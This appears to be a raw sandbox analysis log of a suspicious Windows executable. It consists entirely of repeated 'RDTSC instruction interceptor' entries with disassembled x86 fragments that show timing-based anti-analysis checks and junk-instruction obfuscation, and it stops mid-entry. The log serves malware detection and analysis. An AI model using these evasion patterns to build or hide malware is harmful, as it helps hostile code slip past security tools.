Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FBC8F second address: 9FBCAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007FE100E17066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007FE100E1706Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FBCAC second address: 9FBCEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA796h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jng 00007FE1010EA79Ah 0x00000011 push edi 0x00000012 push esi 0x00000013 pop esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FD316 second address: 9FD32D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jns 00007FE100E17066h 0x0000000e ja 00007FE100E17066h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A006E0 second address: A0072D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007FE1010EA78Ch 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jmp 00007FE1010EA793h 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FE1010EA798h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FEDBE second address: 9FEDDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE100E17079h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FEDDC second address: 9FEDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FE1010EA78Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A00829 second address: A0087D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007FE100E17070h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jg 00007FE100E17066h 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push ebx 0x0000001c pushad 0x0000001d jo 00007FE100E17066h 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 popad 0x00000026 pop ebx 0x00000027 mov eax, dword ptr [eax] 0x00000029 pushad 0x0000002a jno 00007FE100E1706Ch 0x00000030 jmp 00007FE100E17074h 0x00000035 popad 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0087D second address: A00884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A05A3A second address: A05A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A05A3F second address: A05AA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA799h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a je 00007FE1010EA788h 0x00000010 jnl 00007FE1010EA7A3h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FE1010EA799h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A05C1A second address: A05C58 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE100E17066h 0x00000008 jmp 00007FE100E1706Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007FE100E17072h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FE100E1706Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A05C58 second address: A05C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1010EA798h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A05C74 second address: A05C7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A05C7C second address: A05C84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A09705 second address: A0970B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0970B second address: A09710 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A09710 second address: A09716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A09771 second address: A0977B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE1010EA786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0977B second address: A097CC instructions: 0x00000000 rdtsc 0x00000002 je 00007FE100E17071h 0x00000008 jmp 00007FE100E1706Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xor dword ptr [esp], 5C9E72EEh 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FE100E17068h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 xor dword ptr [ebp+12B631E1h], esi 0x00000036 mov edi, dword ptr [ebp+129E3C1Dh] 0x0000003c push F07105D3h 0x00000041 push edx 0x00000042 push ecx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A09A05 second address: A09A0F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE1010EA786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A09A0F second address: A09A14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A09B78 second address: A09B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0A25F second address: A0A263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0A430 second address: A0A43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007FE1010EA786h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0A698 second address: A0A69C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0B5FE second address: A0B604 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0B604 second address: A0B608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0E2E0 second address: A0E2E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0E2E4 second address: A0E2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FE100E1706Eh 0x00000011 jc 00007FE100E17066h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9BE78D second address: 9BE791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9BE791 second address: 9BE797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9BE797 second address: 9BE7AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FE1010EA78Eh 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9BE7AE second address: 9BE7B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0E983 second address: A0E987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A0E987 second address: A0E997 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E1706Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A10AF5 second address: A10B1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA799h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jnc 00007FE1010EA786h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A10B1F second address: A10B66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E1706Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jl 00007FE100E17066h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FE100E17068h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov si, cx 0x00000031 xchg eax, ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushad 0x00000036 popad 0x00000037 pushad 0x00000038 popad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A113E3 second address: A113E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A14079 second address: A1407F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1407F second address: A14083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A14083 second address: A14105 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE100E17066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FE100E17068h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 cmc 0x0000002a push 00000000h 0x0000002c pushad 0x0000002d sub dword ptr [ebp+12B73761h], ebx 0x00000033 mov eax, edi 0x00000035 popad 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edi 0x0000003b call 00007FE100E17068h 0x00000040 pop edi 0x00000041 mov dword ptr [esp+04h], edi 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc edi 0x0000004e push edi 0x0000004f ret 0x00000050 pop edi 0x00000051 ret 0x00000052 mov edi, dword ptr [ebp+12B6C6A9h] 0x00000058 xchg eax, esi 0x00000059 jmp 00007FE100E17078h 0x0000005e push eax 0x0000005f je 00007FE100E17070h 0x00000065 push eax 0x00000066 push edx 0x00000067 push ebx 0x00000068 pop ebx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A17256 second address: A1725B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1725B second address: A172BB instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE100E17068h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FE100E17068h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 mov ebx, dword ptr [ebp+129E182Eh] 0x0000002f push 00000000h 0x00000031 mov di, 9200h 0x00000035 jo 00007FE100E1706Ch 0x0000003b or dword ptr [ebp+129E377Dh], esi 0x00000041 push 00000000h 0x00000043 mov edi, dword ptr [ebp+129E3961h] 0x00000049 mov bx, dx 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 jg 00007FE100E17066h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A172BB second address: A172D0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE1010EA786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FE1010EA786h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A172D0 second address: A172D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1751B second address: A1751F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A19286 second address: A19297 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007FE100E17066h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A183BD second address: A183C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1A2E0 second address: A1A2EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE100E17066h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1A2EB second address: A1A2F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1A2F1 second address: A1A2F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1A2F5 second address: A1A2F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1A2F9 second address: A1A31E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jmp 00007FE100E17078h 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A194F7 second address: A194FC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1A468 second address: A1A46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1A46E second address: A1A4D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov edi, ebx 0x00000008 push dword ptr fs:[00000000h] 0x0000000f clc 0x00000010 push edx 0x00000011 jl 00007FE1010EA789h 0x00000017 mov di, cx 0x0000001a pop edi 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 mov bh, cl 0x00000024 mov eax, dword ptr [ebp+129E110Dh] 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007FE1010EA788h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 00000017h 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 push FFFFFFFFh 0x00000046 mov dword ptr [ebp+129E1800h], ebx 0x0000004c nop 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 jmp 00007FE1010EA78Dh 0x00000055 pop eax 0x00000056 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1C333 second address: A1C338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1B549 second address: A1B55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1010EA78Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1B55B second address: A1B5FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E17074h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a adc edi, 5AE201E2h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FE100E17068h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 call 00007FE100E17076h 0x00000036 stc 0x00000037 pop edi 0x00000038 jbe 00007FE100E17069h 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 mov edi, eax 0x00000047 mov eax, dword ptr [ebp+129E12E1h] 0x0000004d jp 00007FE100E1706Ch 0x00000053 mov edi, dword ptr [ebp+129E2FC0h] 0x00000059 push FFFFFFFFh 0x0000005b call 00007FE100E17072h 0x00000060 pop edi 0x00000061 nop 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 jnc 00007FE100E17066h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1B5FD second address: A1B603 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1A4D1 second address: A1A4ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E17072h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1B603 second address: A1B62A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE1010EA797h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b ja 00007FE1010EA790h 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1A4ED second address: A1A4F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1D43A second address: A1D440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1E3C1 second address: A1E3DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E17076h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1E3DB second address: A1E3E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A213C0 second address: A213D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 jnp 00007FE100E17074h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9D1073 second address: 9D107B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9D107B second address: 9D1080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A21A48 second address: A21A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1D554 second address: A1D55E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FE100E17066h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1E54E second address: A1E552 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1E552 second address: A1E5F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FE100E17068h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f nop 0x00000010 call 00007FE100E1706Ah 0x00000015 pop edi 0x00000016 push dword ptr fs:[00000000h] 0x0000001d jmp 00007FE100E17076h 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 mov eax, dword ptr [ebp+129E0A11h] 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007FE100E17068h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000018h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 push esi 0x0000004a pop ebx 0x0000004b jno 00007FE100E17068h 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push eax 0x00000056 call 00007FE100E17068h 0x0000005b pop eax 0x0000005c mov dword ptr [esp+04h], eax 0x00000060 add dword ptr [esp+04h], 00000016h 0x00000068 inc eax 0x00000069 push eax 0x0000006a ret 0x0000006b pop eax 0x0000006c ret 0x0000006d mov ebx, dword ptr [ebp+129E38E9h] 0x00000073 mov edi, dword ptr [ebp+129E39C5h] 0x00000079 nop 0x0000007a push eax 0x0000007b push edx 0x0000007c jnc 00007FE100E17068h 0x00000082 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1E5F8 second address: A1E5FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A22AC4 second address: A22B47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E1706Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007FE100E17068h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 nop 0x00000013 mov bx, 7385h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007FE100E17068h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 mov dword ptr [ebp+12B64069h], edx 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007FE100E17068h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 0000001Bh 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 